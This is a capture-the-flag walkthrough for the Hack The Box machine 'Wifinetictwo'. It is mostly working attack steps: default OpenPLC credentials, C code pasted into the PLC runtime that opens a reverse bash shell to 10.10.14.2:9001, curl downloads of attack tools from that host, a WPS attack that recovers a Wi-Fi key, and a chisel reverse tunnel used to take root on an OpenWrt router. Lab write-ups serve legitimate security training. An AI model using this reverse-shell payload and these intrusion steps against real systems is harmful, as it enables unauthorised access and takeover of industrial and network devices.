Wifinetictwo HTB
by kpax
Log in on port 8080 as openplc:openplc
Replace the code in the Hardware section with the code below
#include "ladder.h"
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
/* Pin lists for the OpenPLC hardware layer to skip. A lone -1 looks like a
 * terminator meaning "ignore nothing" -- NOTE(review): confirm against
 * ladder.h, which is not shown on this page. */
int ignored_bool_inputs[] = {-1};
int ignored_bool_outputs[] = {-1};
int ignored_int_inputs[] = {-1};
int ignored_int_outputs[] = {-1};
/* Runtime hook, presumably invoked once when the PLC is started
 * (the writeup triggers it via "Start PLC" below). Left empty here. */
void initCustomLayer()
{
}
/* Runtime hook for reading custom inputs. Left empty: the payload lives
 * entirely in updateCustomOut() below. */
void updateCustomIn()
{
}
/*
 * Runtime hook for writing custom outputs, repurposed here as the payload.
 * When the runtime calls it, it opens a TCP connection to the hard-coded
 * address 10.10.14.2:9001, points stdin/stdout/stderr at that socket and
 * replaces the runtime process with bash. The resulting shell runs with the
 * runtime's privileges -- root in the container, per the later step.
 *
 * From a defensive standpoint this shows why the Hardware section must not
 * be reachable with the credentials used above: whatever is pasted there is
 * arbitrary C compiled and executed by the PLC runtime. Nothing below checks
 * a return value, so a failed socket()/connect() still redirects the
 * runtime's own stdio into a dead descriptor.
 */
void updateCustomOut()
{
int port = 9001;
struct sockaddr_in revsockaddr;   /* only the three fields below are set; the rest is left uninitialised */
int sockt = socket(AF_INET, SOCK_STREAM, 0);   /* may be -1; never checked */
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("10.10.14.2");
connect(sockt, (struct sockaddr *) &revsockaddr,
sizeof(revsockaddr));   /* result ignored */
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);
char * const argv[] = {"bash", NULL};
execvp("bash", argv);   /* only returns on failure, which is also ignored */
return 0;   /* NOTE(review): returning a value from a void function is a constraint violation; gcc warns, stricter compilers reject it */
}
Go to the dashboard and click Start PLC to get a reverse shell
Shell as root in the container
Copy oneshot.c to the box and compile it
# Fetched from the web server on 10.10.14.2:8000 onto the compromised container
curl http://10.10.14.2:8000/oneshot.c -o oneshot.c
# -s strips symbols and -O3 optimises; neither changes behaviour
gcc oneshot.c -s -O3 -o oneshot
# Run against the wlan0 interface; the tool output follows (the -K mode is not explained on this page)
./oneshot -i wlan0 -K
PSK Key Found
WPA_PSK : NoWWEDoKnowWhaTisReal123!
Connect to the Wi-Fi network
/etc/wpa_supplicant/wpa_supplicant-wlan0.conf
ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=0
update_config=1
network={
ssid="plcrouter"
psk="NoWWEDoKnowWhaTisReal123!"
key_mgmt=WPA-PSK
proto=WPA2
pairwise=CCMP TKIP
group=CCMP TKIP
scan_ssid=1
}
/etc/systemd/network/25-wlan.network
[Match]
Name=wlan0
[Network]
DHCP=ipv4
# Apply the two config files above: restart networking, then the per-interface wpa_supplicant unit
systemctl restart systemd-networkd.service
systemctl restart wpa_supplicant@wlan0.service
Use Chisel to forward port 80 to the local machine. It's OpenWrt and there is no password to log in.
# Fetch the chisel client binary from the same web server used above
curl http://10.10.14.2:8000/chisel -o chisel
chmod +x chisel
# Reverse tunnel: the chisel server on 10.10.14.2:8081 listens on its port 8080 and relays through this client to 192.168.1.1:80 (the OpenWrt web UI)
./chisel client 10.10.14.2:8081 R:8080:192.168.1.1:80
Load an SSH key under Administration ... SSH-Keys, then SSH from the compromised host to 192.168.1.1 to get the root flag